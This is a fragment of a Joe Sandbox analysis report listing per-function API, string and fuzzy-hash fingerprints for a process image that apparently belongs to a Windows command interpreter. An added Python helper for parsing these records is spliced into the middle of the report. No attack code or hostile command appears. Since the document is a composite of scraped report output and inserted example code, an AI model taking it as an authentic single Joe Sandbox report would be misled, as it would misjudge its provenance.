                                                                                                                    • API ID: Enum$Openwcsrchr
                                                                                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                    • API String ID: 3402383852-1459555574
                                                                                                                    • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction ID: dc353c4174861aaa6e403e47b12eee31b0740c6506c188e98ccad63909a334d8
                                                                                                                    • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                    • Instruction Fuzzy Hash: 25A1C561A0864A82EE10BF95D0102BDEAB4FF85F96FE44531DA4E07785EF7CD949C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                    • String ID: FOR$ IF
                                                                                                                    • API String ID: 557945885-2924197646
                                                                                                                    • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction ID: 9d7bd50e53cce0e2e9e577b5bd62e5e80c7115c79b2af122b9cb92195f6da429
                                                                                                                    • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                    • Instruction Fuzzy Hash: 83519120B0965A82FE54BF159418179AEB1FF85FA6FE84634D91E477D1DE3CE901C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                    • String ID: %04X-%04X$:
                                                                                                                    • API String ID: 930873262-1938371929
                                                                                                                    • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                    • Instruction ID: 987e320783ec34387ee0c211e347fd015ad4fd4f9941b4e9560be08a93d5f1c2
                                                                                                                    • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                    • Instruction Fuzzy Hash: 5E417C21A0CA8AC2EB60AF61E4502BAFAB5FB84B56FE04135DA4E426C5DF3DD544C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 3249344982-2616576482
                                                                                                                    • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                    • Instruction ID: e05ed1e9b0d306c41e542908a96debe3902c02e50c622f39b299e96652b70643
                                                                                                                    • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                    • Instruction Fuzzy Hash: 36413C72A18A4586F3509F12E848769EAB4FB89FDAF949234DA4E07794DF3CD054CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$iswdigit
• String ID: +-~!$<>+-*/%()|^&=,
• API String ID: 2770779731-632268628
• Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
• Instruction ID: df34de3fc4468446fb830bcdb7bf00a112f6337bb3878cfdd0e37d3c24870b52
• Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
• Instruction Fuzzy Hash: 5A31EC32609F5AC5EA50AF11E454279BFB0FB49F86BA58135EA4E43354EF3CE404C720
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1673
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD168D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1757
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD176E
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1788
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD179C
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$Process$Alloc$Size
• String ID:
• API String ID: 3586862581-0
• Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
• Instruction ID: 56e892b6d7901b216f60635b3cdf219a5eae635652501a2592727b73aa0c53b4
• Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
• Instruction Fuzzy Hash: 56916065A0974A82EA54AF15E448278FAB0FB44F96FA98135DA4D07BE0EF3DE445C320
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
• API String ID: 1313749407-0
• Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
• Instruction ID: 09392f7bbeb452ea1877d56a8684b0c8022e84669c73cc8794654376f6eb8bdb
• Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
• Instruction Fuzzy Hash: 7A51B361A0968A52EA54BF159818179EEB5FF85F93FA84234DE1E077D1EF3CE841C320
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: iswdigit$iswspacewcschr
• String ID: )$=,;
• API String ID: 1959970872-2167043656
• Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
• Instruction ID: d03cb7889527400858b9b2eaf56293869ff79451347d70d63488c7fa10b4111f
• Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
• Instruction Fuzzy Hash: BE417964E0825B96FBA46F11E558379BEB0BF10FABFF45076C98D421A0DF3CA441C620
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
• String ID: KEYS$LIST$OFF
• API String ID: 411561164-4129271751
• Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
• Instruction ID: 23122a5cb2d335a7735743499607e02b8607d39f7e468d79c9e067c2f33d8768
• Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
• Instruction Fuzzy Hash: 96217120A0861BC1FA54BF66E454179EA75FF84F92FE09631DA1E472E5EE3CD444C620
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: iswdigit
• String ID: GeToken: (%x) '%s'
• API String ID: 3849470556-1994581435
• Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
• Instruction ID: 4ccf32908bc8f0a3a7b37b05489718d9b68e1c6949ec681cbd4bfbd0e642b850
• Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
• Instruction Fuzzy Hash: D1517C31A0864AC5EB64AF65E444279BBB0FF84F6AFA48435DA4D47390DF7DE841C720
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
• Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
• Instruction ID: cfce7da31b5c915edee0c46d5dfa7cbb31c75f7653b501316315413a2e349f04
• Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
• Instruction Fuzzy Hash: 2F51D826A09689C5EB24EF20D8586B9BBB0FF48F9AF958135DA0D07794EF3CD544C320
Uniqueness
• Uniqueness Score: -1.00%
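
The records above are the Joe Sandbox IDA plugin's per-function fingerprints for the image whose PE header sits at 00007FF789BC0000 (the Offset field): each pairs a memory-dump source with an API ID, String ID, Opcode ID and two fuzzy hashes, and some also list the resolved API call sites. The report only exposes them as text, so the following is an added Python helper (example code, not part of this report and not Joe Sandbox's own tooling) that parses such records into structured data, strips the "Download File" link text the page extraction glued onto the Associated lines, decodes the .sdmp names, and turns the API call-site addresses into image-relative offsets. Assumptions: the .sdmp field layout (process index, stage, dump id, base address, page protection) is inferred from the names in this report and is not documented here; the PAGE_* values are the standard winnt.h constants; the sample input is a trimmed copy of two records shown above.

```python
"""Parse Joe Sandbox 'Memory Dump Source' / 'Similarity' function records into structured data.
Added example, not Joe Sandbox code; the .sdmp field layout below is an assumption."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Standard Windows memory-protection constants (winnt.h PAGE_*).
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
# ASSUMED dump-name layout: <process#>.<stage>.<dump id>.<base address>.<protection>.<rest>.sdmp
DUMP_RE = re.compile(r"^(?P<process>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
                     r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.[0-9A-F.]+\.sdmp$", re.I)
# e.g. "HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000), ref: 00007FF789BD168D"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.-]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]+)$", re.I)
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")   # "API ID: ...", "Offset: ..."
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Similarity", "Uniqueness"}


@dataclass
class FunctionRecord:
    apis: List[Dict[str, str]] = field(default_factory=list)   # name, module, args, ref
    source_file: Optional[str] = None
    associated: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)       # Offset, API ID, Opcode ID, ...


def parse_dump_name(name: str) -> Dict[str, object]:
    """Split a .sdmp name into process index, stage, base address and page protection."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised .sdmp name: {name}")
    protect = int(m.group("protect"), 16)
    return {"process": int(m.group("process"), 16), "stage": int(m.group("stage"), 16),
            "base": int(m.group("base"), 16),
            "protection": PAGE_PROTECTION.get(protect, f"0x{protect:x}")}


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function: opened at 'APIs', or at 'Memory Dump Source' if none is open."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()       # also drops the bullet
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs" or (line == "Memory Dump Source" and (current is None or current.source_file)):
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(m.groupdict())
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value").strip()
        if key == "Source File":     # "<dump>.sdmp, Offset: 00007FF789BC0000, based on PE: true"
            parts = [p.strip() for p in value.split(",")]
            current.source_file = parts[0]
            for extra in parts[1:]:
                k, _, v = extra.partition(":")
                current.fields[k.strip()] = v.strip()
        elif key == "Associated":    # drop the "Download File" link text glued on by extraction
            current.associated.append(re.sub(r"Download File$", "", value).strip())
        else:
            current.fields[key] = value
    return records


def call_site_rvas(rec: FunctionRecord) -> List[int]:
    """Call-site addresses minus the PE Offset: image-relative, so they survive ASLR across runs."""
    base = int(rec.fields["Offset"], 16)
    return [int(a["ref"], 16) - base for a in rec.apis]


# Sample input: two records copied from the report above, trimmed (fewer lines, shorter arg lists).
SAMPLE = """\
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF789BD14D6), ref: 00007FF789BD1673
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6), ref: 00007FF789BD168D
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6), ref: 00007FF789BD176E
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: Heap$Process$Alloc$Size
• String ID:
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
• String ID: KEYS$LIST$OFF
"""
```

Usage: `parse_records(SAMPLE)` yields two records; `parse_dump_name(rec.source_file)` classifies the dump as the PAGE_EXECUTE_READ section of process 6, and `call_site_rvas(rec)` gives 0x11673, 0x1168D and 0x1176E for the three heap calls. The API ID, Opcode ID and fuzzy hashes are produced by the Joe Sandbox IDA plugin and are only comparable with other Joe Sandbox reports; the (API, module) pairs and the call-site offsets, by contrast, can be checked directly against a disassembly of the sample.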

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_setjmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3883041866-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3114114779-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspace
                                                                                                                    • String ID: off
                                                                                                                    • API String ID: 2389812497-733764931
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: %s=%s$DPATH$PATH
                                                                                                                    • API String ID: 3731854180-3148396303
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspacewcschr
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                    • API String ID: 287713880-1183017076
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD3D0C
                                                                                                                      • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D2F
                                                                                                                      • Part of subcall function 00007FF789BD3C24: iswalpha.MSVCRT ref: 00007FF789BD3D4F
                                                                                                                      • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D75
                                                                                                                      • Part of subcall function 00007FF789BD3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3DBF
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6ABF
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6AD3
                                                                                                                      • Part of subcall function 00007FF789BC6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B8B
                                                                                                                      • Part of subcall function 00007FF789BC6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B97
                                                                                                                      • Part of subcall function 00007FF789BC6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6BAF
                                                                                                                      • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B39
                                                                                                                      • Part of subcall function 00007FF789BC6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B4D
                                                                                                                      • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B59
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B03
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B17
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
